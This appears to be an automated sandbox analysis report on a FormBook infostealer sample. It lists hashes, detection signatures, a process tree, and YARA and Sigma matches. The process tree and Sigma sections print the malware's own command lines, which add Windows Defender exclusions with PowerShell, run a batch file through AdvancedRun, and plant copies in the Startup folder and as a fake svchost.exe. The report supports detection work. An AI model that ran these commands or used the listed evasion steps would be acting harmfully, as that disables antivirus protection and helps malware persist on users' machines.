Windows Analysis Report RYhdmjjr94

Overview

General Information

Sample Name: RYhdmjjr94 (renamed file extension from none to exe)
Analysis ID: 483549
MD5: 44696d252000850d3ea71d9ae238aedc
SHA1: 1fb61a1df500f9025641526cb4013d555b129a84
SHA256: 1b39d6bf218028dfe7bc8254a3b1682804e9bf05b8298c708c318236f64ad986
Tags: AfiaWaveEnterprisesOy, exe, Formbook, signed

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell adding suspicious path to exclusion list
Sigma detected: System File Execution Location Anomaly
Maps a DLL or memory area into another process
Drops PE files to the startup folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign process
Sigma detected: Execution from Suspicious Folder
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Drops PE files with benign system names
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Sigma detected: Powershell Defender Exclusion
One or more processes crash
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Stores files to the Windows start menu directory
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Launches processes in debugging mode, may be used to hinder debugging
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Creates files inside the system directory
Found potential string decryption / allocating functions
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file name differs from the original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • RYhdmjjr94.exe (PID: 4328 cmdline: 'C:\Users\user\Desktop\RYhdmjjr94.exe' MD5: 44696D252000850D3EA71D9AE238AEDC)
    • AdvancedRun.exe (PID: 5136 cmdline: 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 3228 cmdline: 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /SpecialRun 4101d8 5136 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6260 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6392 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6512 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6688 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6832 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 36C95A71.exe (PID: 7004 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' MD5: 44696D252000850D3EA71D9AE238AEDC)
      • AdvancedRun.exe (PID: 3132 cmdline: 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • AdvancedRun.exe (PID: 6968 cmdline: 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • powershell.exe (PID: 3016 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5052 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6824 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • powershell.exe (PID: 7104 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5752 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • aspnet_compiler.exe (PID: 6608 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • powershell.exe (PID: 7148 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1140 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3688 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_compiler.exe (PID: 6548 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 6672 cmdline: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' MD5: 44696D252000850D3EA71D9AE238AEDC)
          • AdvancedRun.exe (PID: 7032 cmdline: 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
            • AdvancedRun.exe (PID: 4968 cmdline: 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /SpecialRun 4101d8 7032 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
          • powershell.exe (PID: 6564 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 5020 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 4752 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • WerFault.exe (PID: 6376 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4824 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6172 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6212 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6284 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6456 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6604 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7156 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5496 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 36C95A71.exe (PID: 5628 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' MD5: 44696D252000850D3EA71D9AE238AEDC)
    • AdvancedRun.exe (PID: 4888 cmdline: 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 7060 cmdline: 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /SpecialRun 4101d8 4888 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2564 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2072 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6244 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4908 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6560 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6468 cmdline: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' MD5: 44696D252000850D3EA71D9AE238AEDC)
    • AdvancedRun.exe (PID: 7052 cmdline: 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6368 cmdline: 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /SpecialRun 4101d8 7052 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4492 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5984 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6584 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • svchost.exe (PID: 6068 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6508 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 7004 -ip 7004 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 1008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source: 0.0.RYhdmjjr94.exe.373b3c0.23.unpack; Rule: JoeSecurity_AntiVM_3; Description: Yara detected AntiVM_3; Author: Joe Security
Source: 0.0.RYhdmjjr94.exe.373b3c0.23.unpack; Rule: JoeSecurity_UACBypassusingCMSTP; Description: Yara detected UAC Bypass using CMSTP; Author: Joe Security
Source: 0.0.RYhdmjjr94.exe.38fe890.10.unpack; Rule: JoeSecurity_AntiVM_3; Description: Yara detected AntiVM_3; Author: Joe Security
Source: 0.0.RYhdmjjr94.exe.38fe890.10.unpack; Rule: JoeSecurity_UACBypassusingCMSTP; Description: Yara detected UAC Bypass using CMSTP; Author: Joe Security
Source: 0.0.RYhdmjjr94.exe.38fe890.26.unpack; Rule: JoeSecurity_AntiVM_3; Description: Yara detected AntiVM_3; Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly
Source: Process started; Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community; Data: Command: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', CommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\2FDD6624\svchost.exe, NewProcessName: C:\Users\Public\Documents\2FDD6624\svchost.exe, OriginalFileName: C:\Users\Public\Documents\2FDD6624\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', ProcessId: 6672
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', CommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\2FDD6624\svchost.exe, NewProcessName: C:\Users\Public\Documents\2FDD6624\svchost.exe, OriginalFileName: C:\Users\Public\Documents\2FDD6624\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', ProcessId: 6672
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', CommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\2FDD6624\svchost.exe, NewProcessName: C:\Users\Public\Documents\2FDD6624\svchost.exe, OriginalFileName: C:\Users\Public\Documents\2FDD6624\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', ProcessId: 6672
Sigma detected: Powershell Defender Exclusion
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\RYhdmjjr94.exe', ParentImage: C:\Users\user\Desktop\RYhdmjjr94.exe, ParentProcessId: 4328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, ProcessId: 6260
Sigma detected: Conhost Parent Process Executions
Source: Process started; Author: omkar72; Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6824, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6556
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\RYhdmjjr94.exe', ParentImage: C:\Users\user\Desktop\RYhdmjjr94.exe, ParentProcessId: 4328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, ProcessId: 6260
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', CommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\2FDD6624\svchost.exe, NewProcessName: C:\Users\Public\Documents\2FDD6624\svchost.exe, OriginalFileName: C:\Users\Public\Documents\2FDD6624\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe', ProcessId: 6672
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132761948065027952.6260.DefaultAppDomain.powershell

Malware Analysis System Evasion:

Sigma detected: Powershell adding suspicious path to exclusion list
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\RYhdmjjr94.exe', ParentImage: C:\Users\user\Desktop\RYhdmjjr94.exe, ParentProcessId: 4328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force, ProcessId: 6512

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: RYhdmjjr94.exe; Virustotal: Detection: 45%
Source: RYhdmjjr94.exe; Metadefender: Detection: 22%
Source: RYhdmjjr94.exe; ReversingLabs: Detection: 51%
Yara detected FormBook
Source: Yara match; file source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY
